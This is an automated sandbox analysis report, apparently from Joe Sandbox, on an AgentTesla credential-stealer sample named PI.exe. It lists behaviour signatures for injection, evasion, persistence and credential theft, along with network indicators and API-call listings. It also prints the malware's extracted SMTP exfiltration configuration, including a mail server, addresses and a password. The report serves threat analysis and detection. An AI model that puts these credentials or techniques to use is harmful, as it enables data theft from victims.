Play interactive tour

Edit tour

Analysis Report PI.exe

Overview

General Information

Sample Name:	PI.exe
Analysis ID:	321388
MD5:	dbda32339a6965fefc794f220f944016
SHA1:	3e53b09125eb1e031f5f0e777836ba738b84fc42
SHA256:	c62b96f303f538748543747d1dacb97119dd9826b53ef6c8350b5b24d69f0006
Tags:	AgentTeslaexe
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AgentTesla

.NET source code contains potential unpacker

Allocates memory in foreign processes

Contains functionality to detect sleep reduction / modifications

Delayed program exit found

Drops VBS files to the startup folder

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

PI.exe (PID: 6512 cmdline: 'C:\Users\user\Desktop\PI.exe' MD5: DBDA32339A6965FEFC794F220F944016)

notepad.exe (PID: 1476 cmdline: C:\Windows\system32\notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)

PI.exe (PID: 5152 cmdline: 'C:\Users\user\Desktop\PI.exe' MD5: DBDA32339A6965FEFC794F220F944016)

PI.exe (PID: 4600 cmdline: 'C:\Users\user\Desktop\PI.exe' 2 5152 5197828 MD5: DBDA32339A6965FEFC794F220F944016)

wscript.exe (PID: 6776 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

PI.exe (PID: 6744 cmdline: 'C:\Users\user\Desktop\PI.exe' MD5: DBDA32339A6965FEFC794F220F944016)

notepad.exe (PID: 6636 cmdline: C:\Windows\system32\notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)

PI.exe (PID: 6728 cmdline: 'C:\Users\user\Desktop\PI.exe' MD5: DBDA32339A6965FEFC794F220F944016)

PI.exe (PID: 6788 cmdline: 'C:\Users\user\Desktop\PI.exe' 2 6728 5209890 MD5: DBDA32339A6965FEFC794F220F944016)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "l6qpC", "URL: ": "https://xmFob4yUwp.org", "To: ": "info@hybridgroupco.com", "ByHost: ": "mail.hybridgroupco.com:587", "Password: ": "PWiE8a9WlECjO", "From: ": "info@hybridgroupco.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.941812642.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.941872630.0000000000475000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.942359260.0000000002180000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.942468067.0000000002252000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.708227438.00000000027D5000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.681442399.00000000027E5000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.943139633.0000000002AC1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.705557320.0000000000475000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.681329227.0000000002772000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.706213393.0000000000790000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.707115774.0000000000BB2000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000001.705125363.0000000000499000.00000040.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.943293284.0000000002B8A000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.942414784.00000000021E2000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.943432491.0000000002C69000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PI.exe PID: 6744	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PI.exe PID: 6728	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PI.exe PID: 6512	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PI.exe PID: 5152	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PI.exe PID: 5152	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.PI.exe.2180000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.PI.exe.bb0000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.PI.exe.2180000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.PI.exe.790000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.PI.exe.2250000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.PI.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.PI.exe.2760000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.1.PI.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.PI.exe.2770000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.PI.exe.b40000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.PI.exe.790000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.PI.exe.21e0000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.PI.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 8 entries

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\notepad.exe, ProcessId: 1476, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: PI.exe.5152.2.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "l6qpC", "URL: ": "https://xmFob4yUwp.org", "To: ": "info@hybridgroupco.com", "ByHost: ": "mail.hybridgroupco.com:587", "Password: ": "PWiE8a9WlECjO", "From: ": "info@hybridgroupco.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: PI.exe

ReversingLabs: Detection: 52%

Machine Learning detection for sample

Show sources

Source: PI.exe

Joe Sandbox ML: detected

Source: 7.2.PI.exe.bb0000.3.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.2.PI.exe.2250000.3.unpack	Avira: Label: TR/Spy.Gen8
Source: 7.2.PI.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 5.2.PI.exe.2760000.3.unpack	Avira: Label: TR/Spy.Gen8

Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00408994 FindFirstFileA,GetLastError,	0_2_00408994
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_00405AE8
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00408994 FindFirstFileA,GetLastError,	3_2_00408994
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	3_2_00405AE8
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00408994 FindFirstFileA,GetLastError,	5_2_00408994
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	5_2_00405AE8

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.4:49745 -> 66.70.204.222:587

Source: Joe Sandbox View

IP Address: 66.70.204.222 66.70.204.222

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: global traffic

TCP traffic: 192.168.2.4:49745 -> 66.70.204.222:587

Source: C:\Users\user\Desktop\PI.exe

Code function: 2_2_0233A186 recv,

2_2_0233A186

Source: unknown

DNS traffic detected: queries for: mail.hybridgroupco.com

Source: PI.exe, PI.exe, 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:
Source: PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust
Source: PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: PI.exe, PI.exe, 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: PI.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/
Source: PI.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: PI.exe, 00000000.00000002.681442399.00000000027E5000.00000040.00000001.sdmp, PI.exe, 00000002.00000002.941812642.0000000000402000.00000040.00000001.sdmp, PI.exe, 00000005.00000002.708227438.00000000027D5000.00000040.00000001.sdmp, PI.exe, 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/U
Source: PI.exe, 00000002.00000002.943432491.0000000002C69000.00000004.00000001.sdmp, PI.exe, 00000002.00000002.943600197.0000000002D98000.00000004.00000001.sdmp	String found in binary or memory: https://xmFob4yUwp.org
Source: PI.exe, 00000002.00000002.943293284.0000000002B8A000.00000004.00000001.sdmp	String found in binary or memory: https://xmFob4yUwp.org$

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_004070C2 OpenClipboard,

0_2_004070C2

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_00423388 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

0_2_00423388

Source: C:\Users\user\Desktop\PI.exe

Code function: 3_2_004239CC GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

3_2_004239CC

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_004586FC GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,

0_2_004586FC

System Summary:

Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004547D0 NtdllDefWindowProc_A,	0_2_004547D0
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0042E46C NtdllDefWindowProc_A,	0_2_0042E46C
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00454F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_00454F4C
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00454FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_00454FFC
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004493A0 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,	0_2_004493A0
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00439CA4 NtdllDefWindowProc_A,GetCapture,	0_2_00439CA4
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_0046E159 NtCreateSection,	2_2_0046E159
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_0233B362 NtQuerySystemInformation,	2_2_0233B362
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_0233B331 NtQuerySystemInformation,	2_2_0233B331
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_004547D0 NtdllDefWindowProc_A,	3_2_004547D0
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_0042E46C NtdllDefWindowProc_A,	3_2_0042E46C
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00454F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	3_2_00454F4C
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00454FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	3_2_00454FFC
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_004493A0 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	3_2_004493A0
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00439CA4 NtdllDefWindowProc_A,GetCapture,	3_2_00439CA4
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_004547D0 NtdllDefWindowProc_A,	5_2_004547D0
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_0042E46C NtdllDefWindowProc_A,	5_2_0042E46C
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00454F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	5_2_00454F4C
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00454FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	5_2_00454FFC
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_004493A0 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	5_2_004493A0
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00439CA4 NtdllDefWindowProc_A,GetCapture,	5_2_00439CA4

Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0044EEA4	0_2_0044EEA4
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004493A0	0_2_004493A0
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00471BA8	0_2_00471BA8
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0046BD44	0_2_0046BD44
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_00467976	2_2_00467976
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_0046D13D	2_2_0046D13D
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_02332478	2_2_02332478
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E33468	2_2_04E33468
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E20007	2_2_04E20007
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E39010	2_2_04E39010
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E331F8	2_2_04E331F8
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E37990	2_2_04E37990
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E31568	2_2_04E31568
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E31D20	2_2_04E31D20
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3810F	2_2_04E3810F
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3B6E8	2_2_04E3B6E8
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3DBB8	2_2_04E3DBB8
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E39388	2_2_04E39388
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3CB34	2_2_04E3CB34
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3C8EB	2_2_04E3C8EB
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E39CFE	2_2_04E39CFE
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E384B1	2_2_04E384B1
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E328B8	2_2_04E328B8
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3C8B8	2_2_04E3C8B8
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E348BE	2_2_04E348BE
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3C889	2_2_04E3C889
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E32099	2_2_04E32099
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3C877	2_2_04E3C877
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E36C35	2_2_04E36C35
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E39000	2_2_04E39000
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3D5C3	2_2_04E3D5C3
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E355D3	2_2_04E355D3
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E38998	2_2_04E38998
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E31559	2_2_04E31559
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E32136	2_2_04E32136
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3553A	2_2_04E3553A
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E39D03	2_2_04E39D03
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E39D08	2_2_04E39D08
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E31D10	2_2_04E31D10
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E37A98	2_2_04E37A98
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3566C	2_2_04E3566C
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E36A72	2_2_04E36A72
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E37E78	2_2_04E37E78
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E33468	2_2_04E33468
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3A3A2	2_2_04E3A3A2
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E3DBA9	2_2_04E3DBA9
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E357AD	2_2_04E357AD
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_04E39378	2_2_04E39378
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A59C8	2_2_059A59C8
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A07F0	2_2_059A07F0
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A0D10	2_2_059A0D10
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A7710	2_2_059A7710
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A3F22	2_2_059A3F22
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A3740	2_2_059A3740
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A5370	2_2_059A5370
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A1EB0	2_2_059A1EB0
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A1CC0	2_2_059A1CC0
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A56F3	2_2_059A56F3
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A7E08	2_2_059A7E08
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A8648	2_2_059A8648
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A0788	2_2_059A0788
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A0DBB	2_2_059A0DBB
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A07D3	2_2_059A07D3
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A63CC	2_2_059A63CC
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A0DCD	2_2_059A0DCD
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A3FC7	2_2_059A3FC7
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A7DF8	2_2_059A7DF8
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A1115	2_2_059A1115
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A7703	2_2_059A7703
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A3731	2_2_059A3731
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A3F7C	2_2_059A3F7C
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A0E93	2_2_059A0E93
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A7E87	2_2_059A7E87
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A72BC	2_2_059A72BC
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A1CB0	2_2_059A1CB0
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A1EA3	2_2_059A1EA3
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A08D6	2_2_059A08D6
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A0CF2	2_2_059A0CF2
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A2414	2_2_059A2414
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A0A2A	2_2_059A0A2A
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_059A0E6A	2_2_059A0E6A
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_0044EEA4	3_2_0044EEA4
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_004493A0	3_2_004493A0
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00471BA8	3_2_00471BA8
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_0046BD44	3_2_0046BD44
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_0044EEA4	5_2_0044EEA4
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_004493A0	5_2_004493A0
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00471BA8	5_2_00471BA8
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_0046BD44	5_2_0046BD44
Source: C:\Users\user\Desktop\PI.exe	Code function: 7_2_00467976	7_2_00467976
Source: C:\Users\user\Desktop\PI.exe	Code function: 7_2_0046D13D	7_2_0046D13D

Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 004035DC appears 109 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 00467F3C appears 33 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 00403E24 appears 54 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 00402774 appears 44 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 0040436C appears 54 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 004066E0 appears 48 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 004148B4 appears 36 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 00404348 appears 233 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 0040C2CC appears 54 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 004039A8 appears 118 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 00403DD0 appears 40 times
Source: C:\Users\user\Desktop\PI.exe	Code function: String function: 0040695C appears 42 times

Source: PI.exe

Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Source: PI.exe, 00000000.00000002.681442399.00000000027E5000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs PI.exe
Source: PI.exe, 00000000.00000002.681052578.0000000002370000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs PI.exe
Source: PI.exe	Binary or memory string: OriginalFilename vs PI.exe
Source: PI.exe, 00000002.00000002.941812642.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs PI.exe
Source: PI.exe, 00000002.00000002.944407117.00000000058A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx.mui vs PI.exe
Source: PI.exe, 00000002.00000002.944104826.0000000005210000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs PI.exe
Source: PI.exe, 00000003.00000002.707407270.0000000002330000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs PI.exe
Source: PI.exe, 00000005.00000002.708291240.0000000002836000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs PI.exe
